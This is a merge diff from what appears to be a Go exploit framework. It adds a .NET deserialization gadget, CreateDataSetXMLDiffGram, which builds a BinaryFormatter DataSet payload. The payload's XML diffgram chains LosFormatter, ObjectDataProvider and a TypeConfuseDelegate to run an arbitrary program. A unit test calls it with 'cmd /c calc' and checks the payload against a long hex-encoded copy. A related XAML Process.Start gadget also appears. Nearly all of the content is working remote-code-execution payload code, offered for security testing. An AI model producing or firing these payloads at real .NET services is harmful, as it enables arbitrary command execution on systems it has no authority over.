Merge pull request #429 from vulncheck-oss/dotnetdeserialization-2

 Added CreateDataSetXMLDiffGram gadget and test

Author: j-baines

dotnet/dotnetgadget.go

@@ -108,6 +108,80 @@ func IsValidXML(data []byte) bool {
 	return xml.Unmarshal(data, new(interface{})) == nil
 }
 
+func CreateDataSetXMLDiffGram(program string, args string) (string, bool) {
+	string0 := `<xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="dataset0">
+                <xs:element name="dataset0" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">
+                    <xs:complexType>
+                        <xs:choice minOccurs="0" maxOccurs="unbounded">
+                            <xs:element name="element0">
+                                <xs:complexType>
+                                    <xs:sequence>
+                                        <xs:element name="element1" msdata:DataType="System.Collections.Generic.List` + "`" + `1[[System.Data.Services.Internal.ExpandedWrapper` + "`" + `2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" type="xs:anyType" minOccurs="0"/>
+                                    </xs:sequence>
+                                </xs:complexType>
+                            </xs:element>
+                        </xs:choice>
+                    </xs:complexType>
+                </xs:element>
+            </xs:schema>`
+
+	innerTypeConfuseDelegate, ok := CreateTypeConfuseDelegate(program, args, LOSFormatter)
+	if !ok {
+		return "", false
+	}
+	b64String := make([]byte, base64.StdEncoding.EncodedLen(len(innerTypeConfuseDelegate)))
+	base64.StdEncoding.Encode(b64String, []byte(innerTypeConfuseDelegate))
+	innerTypeConfuseDelegateBase64 := string(b64String)
+
+	string1 := `<diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
+                <dataset0>
+                    <element0 diffgr:id="Table" msdata:rowOrder="0" diffgr:hasChanges="inserted">
+                        <element1 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
+                            <ExpandedWrapperOfLosFormatterObjectDataProvider xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" >
+                                <ExpandedElement/>
+                                <ProjectedProperty0>
+                                    <MethodName>Deserialize</MethodName>
+                                    <MethodParameters>
+                                        <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">` + innerTypeConfuseDelegateBase64 + `</anyType>
+                                    </MethodParameters>
+                                    <ObjectInstance xsi:type="LosFormatter"></ObjectInstance>
+                                </ProjectedProperty0>
+                            </ExpandedWrapperOfLosFormatterObjectDataProvider>
+                        </element1>
+                    </element0>
+                </dataset0>
+            </diffgr:diffgram>`
+	libraryID := 2
+	binaryLibrary := BinaryLibraryRecord{ID: libraryID, Library: "System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"}
+	className := "System.Data.DataSet"
+	memberNames := []string{"XmlSchema", "XmlDiffGram"}
+	var memberValues []interface{}
+	var additionalInfo []interface{}
+	memberTypes := []string{
+		"String",
+		"String",
+	}
+	memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 3, Value: string0})
+	memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 4, Value: string1})
+	classInfo := ClassInfo{ObjectID: 1, Name: className, MemberCount: len(memberNames), MemberNames: memberNames}
+	memberTypeInfo, ok := getMemberTypeInfo(memberTypes, memberNames, additionalInfo)
+	if !ok {
+		return "", false
+	}
+	classWithMembersAndTypes := ClassWithMembersAndTypesRecord{ClassInfo: classInfo, LibraryID: libraryID, MemberTypeInfo: memberTypeInfo, MemberValues: memberValues, BinaryLibrary: binaryLibrary}
+	classWithMembersAndTypesString, ok := classWithMembersAndTypes.ToRecordBin()
+	if !ok {
+		return "", false
+	}
+	serializationHeaderRecord := SerializationHeaderRecord{RootID: 1, HeaderID: -1}
+	serializationHeaderRecordString, _ := serializationHeaderRecord.ToRecordBin()
+	binLibString, _ := binaryLibrary.ToRecordBin()
+
+	payload := serializationHeaderRecordString + binLibString + classWithMembersAndTypesString + string(byte(RecordTypeEnumMap["MessageEnd"]))
+
+	return payload, true
+}
+
 func CreateTextFormattingRunProperties(program string, args string, formatter string) (string, bool) {
 	xmlData := fmt.Sprintf(`<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:X="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:S="clr-namespace:System;assembly=mscorlib" xmlns:D="clr-namespace:System.Diagnostics;assembly=system"><ObjectDataProvider X:Key="" ObjectType="{X:Type D:Process}" MethodName="Start"><ObjectDataProvider.MethodParameters><S:String>%s</S:String><S:String>%s</S:String></ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>`, program, args)
 

dotnet/dotnetgadget_test.go

@@ -149,6 +149,13 @@ func TestCreateClaimsPrincipal(t *testing.T) {
 	}
 }
 
+func TestCreateDataSetXMLDiffGram(t *testing.T) {
+	got, ok := CreateDataSetXMLDiffGram("cmd", "/c calc")
+	if !ok || fmt.Sprintf("%02x", got) != "0001000000ffffffff01000000000000000c020000004e53797374656d2e446174612c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d6237376135633536313933346530383905010000001353797374656d2e446174612e446174615365740200000009586d6c536368656d610b586d6c446966664772616d0101020000000603000000960a3c78733a736368656d6120786d6c6e733d222220786d6c6e733a78733d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612220786d6c6e733a6d73646174613d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a786d6c2d6d7364617461222069643d226461746173657430223e0a202020202020202020202020202020203c78733a656c656d656e74206e616d653d22646174617365743022206d73646174613a4973446174615365743d227472756522206d73646174613a55736543757272656e744c6f63616c653d2274727565223e0a20202020202020202020202020202020202020203c78733a636f6d706c6578547970653e0a2020202020202020202020202020202020202020202020203c78733a63686f696365206d696e4f63637572733d223022206d61784f63637572733d22756e626f756e646564223e0a202020202020202020202020202020202020202020202020202020203c78733a656c656d656e74206e616d653d22656c656d656e7430223e0a20202020202020202020202020202020202020202020202020202020202020203c78733a636f6d706c6578547970653e0a2020202020202020202020202020202020202020202020202020202020202020202020203c78733a73657175656e63653e0a202020202020202020202020202020202020202020202020202020202020202020202020202020203c78733a656c656d656e74206e616d653d22656c656d656e743122206d73646174613a44617461547970653d2253797374656d2e436f6c6c656374696f6e732e47656e657269632e4c69737460315b5b53797374656d2e446174612e53657276696365732e496e7465726e616c2e457870616e6465645772617070657260325b5b53797374656d2e5765622e55492e4c6f73466f726d61747465722c2053797374656d2e5765622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623033663566376631316435306133615d2c5b53797374656d2e57696e646f77732e446174612e4f626a6563744461746150726f76696465722c2050726573656e746174696f6e4672616d65776f726b2c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d333162663338353661643336346533355d5d2c2053797374656d2e446174612e53657276696365732c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d2220747970653d2278733a616e795479706522206d696e4f63637572733d2230222f3e0a2020202020202020202020202020202020202020202020202020202020202020202020203c2f78733a73657175656e63653e0a20202020202020202020202020202020202020202020202020202020202020203c2f78733a636f6d706c6578547970653e0a202020202020202020202020202020202020202020202020202020203c2f78733a656c656d656e743e0a2020202020202020202020202020202020202020202020203c2f78733a63686f6963653e0a20202020202020202020202020202020202020203c2f78733a636f6d706c6578547970653e0a202020202020202020202020202020203c2f78733a656c656d656e743e0a2020202020202020202020203c2f78733a736368656d613e06040000009e223c6469666667723a646966666772616d20786d6c6e733a6d73646174613d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a786d6c2d6d73646174612220786d6c6e733a6469666667723d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a786d6c2d646966666772616d2d7631223e0a202020202020202020202020202020203c64617461736574303e0a20202020202020202020202020202020202020203c656c656d656e7430206469666667723a69643d225461626c6522206d73646174613a726f774f726465723d223022206469666667723a6861734368616e6765733d22696e736572746564223e0a2020202020202020202020202020202020202020202020203c656c656d656e743120786d6c6e733a7873693d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612d696e7374616e63652220786d6c6e733a7873643d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d61223e0a202020202020202020202020202020202020202020202020202020203c457870616e646564577261707065724f664c6f73466f726d61747465724f626a6563744461746150726f766964657220786d6c6e733a7873693d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612d696e7374616e63652220786d6c6e733a7873643d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d6122203e0a20202020202020202020202020202020202020202020202020202020202020203c457870616e646564456c656d656e742f3e0a20202020202020202020202020202020202020202020202020202020202020203c50726f6a656374656450726f7065727479303e0a2020202020202020202020202020202020202020202020202020202020202020202020203c4d6574686f644e616d653e446573657269616c697a653c2f4d6574686f644e616d653e0a2020202020202020202020202020202020202020202020202020202020202020202020203c4d6574686f64506172616d65746572733e0a202020202020202020202020202020202020202020202020202020202020202020202020202020203c616e795479706520786d6c6e733a7873693d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612d696e7374616e63652220786d6c6e733a7873643d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d6122207873693a747970653d227873643a737472696e67223e2f774579774245414151414141502f2f2f2f38424141414141414141414177434141414153564e356333526c62537767566d567963326c76626a30304c6a41754d4334774c4342446457783064584a6c5057356c645852795957777349464231596d78705930746c6556527661325675505749334e324531597a55324d546b7a4e4755774f446b46415141414149514255336c7a644756744c6b4e766247786c593352706232357a4c6b646c626d567961574d75553239796447566b553256305944466257314e356333526c6253355464484a70626d63734947317a5932397962476c694c4342575a584a7a61573975505451754d4334774c6a417349454e3162485231636d5539626d563164484a68624377675548566962476c6a53325635564739725a573439596a63335954566a4e5459784f544d305a5441344f563164424141414141564462335675644168446232317759584a6c636764575a584a7a6157397542556c305a57317a41414d414267694e41564e356333526c62533544623278735a574e3061573975637935485a57356c636d6c6a4c6b4e7662584268636d6c7a623235446232317759584a6c636d41785731745465584e305a573075553352796157356e4c43427463324e76636d787059697767566d567963326c76626a30304c6a41754d4334774c4342446457783064584a6c5057356c645852795957777349464231596d78705930746c6556527661325675505749334e324531597a55324d546b7a4e4755774f446c6458516743414141414167414141416b44414141414167414141416b454141414142414d414141434e41564e356333526c62533544623278735a574e3061573975637935485a57356c636d6c6a4c6b4e7662584268636d6c7a623235446232317759584a6c636d41785731745465584e305a573075553352796157356e4c43427463324e76636d787059697767566d567963326c76626a30304c6a41754d4334774c4342446457783064584a6c5057356c645852795957777349464231596d78705930746c6556527661325675505749334e324531597a55324d546b7a4e4755774f446c64585145414141414c58324e7662584268636d6c7a62323444496c4e356333526c625335455a57786c5a3246305a564e6c636d6c6862476c3659585270623235496232786b5a58494a4251414141424545414141414167414141415947414141414279396a49474e6862474d474277414141414e6a625751454251414141434a5465584e305a573075524756735a576468644756545a584a7059577870656d463061573975534739735a47567941774141414168455a57786c5a3246305a5164745a58526f623251774232316c644768765a44454441774d7755336c7a644756744c6b526c6247566e5958526c55325679615746736158706864476c76626b68766247526c636974455a57786c5a3246305a55567564484a354c314e356333526c625335535a575a735a574e30615739754c6b316c62574a6c636b6c755a6d39545a584a7059577870656d463061573975534739735a4756794c314e356333526c625335535a575a735a574e30615739754c6b316c62574a6c636b6c755a6d39545a584a7059577870656d463061573975534739735a475679435167414141414a4351414141416b4b41414141424167414141417755336c7a644756744c6b526c6247566e5958526c55325679615746736158706864476c76626b68766247526c636974455a57786c5a3246305a55567564484a3542774141414152306558426c4347467a63325674596d7835426e5268636d646c64424a3059584a6e5a5852556558426c51584e7a5a57316962486b4f644746795a32563056486c775a5535686257554b625756306147396b546d46745a51316b5a57786c5a3246305a55567564484a354151454341514542417a425465584e305a573075524756735a576468644756545a584a7059577870656d463061573975534739735a4756794b30526c6247566e5958526c52573530636e6b4743774141414c414355336c7a644756744c6b5a31626d4e674d31746255336c7a644756744c6c4e30636d6c755a79776762584e6a62334a736157497349465a6c636e4e70623234394e4334774c6a41754d43776751335673644856795a5431755a585630636d46734c43425164574a7361574e4c5a586c556232746c626a31694e7a64684e574d314e6a45354d7a526c4d4467355853786255336c7a644756744c6c4e30636d6c755a79776762584e6a62334a736157497349465a6c636e4e70623234394e4334774c6a41754d43776751335673644856795a5431755a585630636d46734c43425164574a7361574e4c5a586c556232746c626a31694e7a64684e574d314e6a45354d7a526c4d4467355853786255336c7a644756744c6b52705957647562334e3061574e7a4c6c427962324e6c63334d7349464e356333526c62537767566d567963326c76626a30304c6a41754d4334774c4342446457783064584a6c5057356c645852795957777349464231596d78705930746c6556527661325675505749334e324531597a55324d546b7a4e4755774f446c645851594d414141415332317a5932397962476c694c4342575a584a7a61573975505451754d4334774c6a417349454e3162485231636d5539626d563164484a68624377675548566962476c6a53325635564739725a573439596a63335954566a4e5459784f544d305a5441344f516f474451414141456c5465584e305a57307349465a6c636e4e70623234394e4334774c6a41754d43776751335673644856795a5431755a585630636d46734c43425164574a7361574e4c5a586c556232746c626a31694e7a64684e574d314e6a45354d7a526c4d446735426734414141416155336c7a644756744c6b52705957647562334e3061574e7a4c6c427962324e6c63334d4744774141414156546447467964416b514141414142416b414141417655336c7a644756744c6c4a6c5a6d786c593352706232347554575674596d56795357356d62314e6c636d6c6862476c3659585270623235496232786b5a58494841414141424535686257554d51584e7a5a57316962486c4f5957316c43554e7359584e7a546d46745a516c546157647559585231636d554b55326c6e626d463064584a6c4d67704e5a5731695a584a556558426c4545646c626d567961574e42636d64316257567564484d4241514542415141444341315465584e305a57307556486c775a567464435138414141414a4451414141416b4f41414141426851414141412b55336c7a644756744c6b52705957647562334e3061574e7a4c6c427962324e6c63334d6755335268636e516f55336c7a644756744c6c4e30636d6c755a79776755336c7a644756744c6c4e30636d6c755a796b47465141414144355465584e305a57307552476c685a3235766333527059334d7555484a765932567a63794254644746796443685465584e305a573075553352796157356e4c43425465584e305a573075553352796157356e4b5167414141414b41516f414141414a41414141426859414141414851323974634746795a516b4d41414141426867414141414e55336c7a644756744c6c4e30636d6c755a77595a414141414b306c7564444d7949454e7662584268636d556f55336c7a644756744c6c4e30636d6c755a79776755336c7a644756744c6c4e30636d6c755a796b474767414141444a5465584e305a573075535735304d7a496751323974634746795a53685465584e305a573075553352796157356e4c43425465584e305a573075553352796157356e4b5167414141414b415241414141414941414141426873414141427855336c7a644756744c6b4e7662584268636d6c7a623235674d56746255336c7a644756744c6c4e30636d6c755a79776762584e6a62334a736157497349465a6c636e4e70623234394e4334774c6a41754d43776751335673644856795a5431755a585630636d46734c43425164574a7361574e4c5a586c556232746c626a31694e7a64684e574d314e6a45354d7a526c4d4467355856304a4441414141416f4a4441414141416b5941414141435259414141414b43773d3d3c2f616e79547970653e0a2020202020202020202020202020202020202020202020202020202020202020202020203c2f4d6574686f64506172616d65746572733e0a2020202020202020202020202020202020202020202020202020202020202020202020203c4f626a656374496e7374616e6365207873693a747970653d224c6f73466f726d6174746572223e3c2f4f626a656374496e7374616e63653e0a20202020202020202020202020202020202020202020202020202020202020203c2f50726f6a656374656450726f7065727479303e0a202020202020202020202020202020202020202020202020202020203c2f457870616e646564577261707065724f664c6f73466f726d61747465724f626a6563744461746150726f76696465723e0a2020202020202020202020202020202020202020202020203c2f656c656d656e74313e0a20202020202020202020202020202020202020203c2f656c656d656e74303e0a202020202020202020202020202020203c2f64617461736574303e0a2020202020202020202020203c2f6469666667723a646966666772616d3e0b" {
+		t.Fatalf("Invalid CreateDataSetXMLDiffGram output... val: %q hexform: %02x\n", got, got)
+	}
+}
+
 func TestCreateCreateDataSetTypeSpoof(t *testing.T) {
 	got, ok := CreateDataSetTypeSpoof("cmd", "/c calc", "BinaryFormatter")
 	if !ok || fmt.Sprintf("%02x", got) != "0001000000ffffffff01000000000000000c02000000086d73636f726c69620c030000004e53797374656d2e446174612c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d6237376135633536313933346530383905010000006353797374656d2e446174612e446174615365742c2053797374656d2e446174612c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038390a00000016446174615365742e52656d6f74696e67466f726d617413446174615365742e446174615365744e616d6511446174615365742e4e616d6573706163650e446174615365742e50726566697815446174615365742e4361736553656e73697469766512446174615365742e4c6f63616c654c4349441a446174615365742e456e666f726365436f6e73747261696e74731a446174615365742e457874656e64656450726f7065727469657314446174615365742e5461626c65732e436f756e7410446174615365742e5461626c65735f30040101010000000200071f53797374656d2e446174612e53657269616c697a6174696f6e466f726d61740300000001080108020200000005fcffffff1f53797374656d2e446174612e53657269616c697a6174696f6e466f726d6174010000000776616c75655f5f00080300000001000000060500000000090500000009050000000009040000000a0100000009060000000f06000000d0020000020001000000ffffffff01000000000000000c020000005e4d6963726f736f66742e506f7765725368656c6c2e456469746f722c2056657273696f6e3d332e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d333162663338353661643336346533350501000000424d6963726f736f66742e56697375616c53747564696f2e546578742e466f726d617474696e672e54657874466f726d617474696e6752756e50726f70657274696573010000000f466f726567726f756e64427275736801020000000603000000f2033c5265736f7572636544696374696f6e61727920786d6c6e733d22687474703a2f2f736368656d61732e6d6963726f736f66742e636f6d2f77696e66782f323030362f78616d6c2f70726573656e746174696f6e2220786d6c6e733a583d22687474703a2f2f736368656d61732e6d6963726f736f66742e636f6d2f77696e66782f323030362f78616d6c2220786d6c6e733a533d22636c722d6e616d6573706163653a53797374656d3b617373656d626c793d6d73636f726c69622220786d6c6e733a443d22636c722d6e616d6573706163653a53797374656d2e446961676e6f73746963733b617373656d626c793d73797374656d223e3c4f626a6563744461746150726f766964657220583a4b65793d2222204f626a656374547970653d227b583a5479706520443a50726f636573737d22204d6574686f644e616d653d225374617274223e3c4f626a6563744461746150726f76696465722e4d6574686f64506172616d65746572733e3c533a537472696e673e636d643c2f533a537472696e673e3c533a537472696e673e2f632063616c633c2f533a537472696e673e3c2f4f626a6563744461746150726f76696465722e4d6574686f64506172616d65746572733e3c2f4f626a6563744461746150726f76696465723e3c2f5265736f7572636544696374696f6e6172793e0b0b" {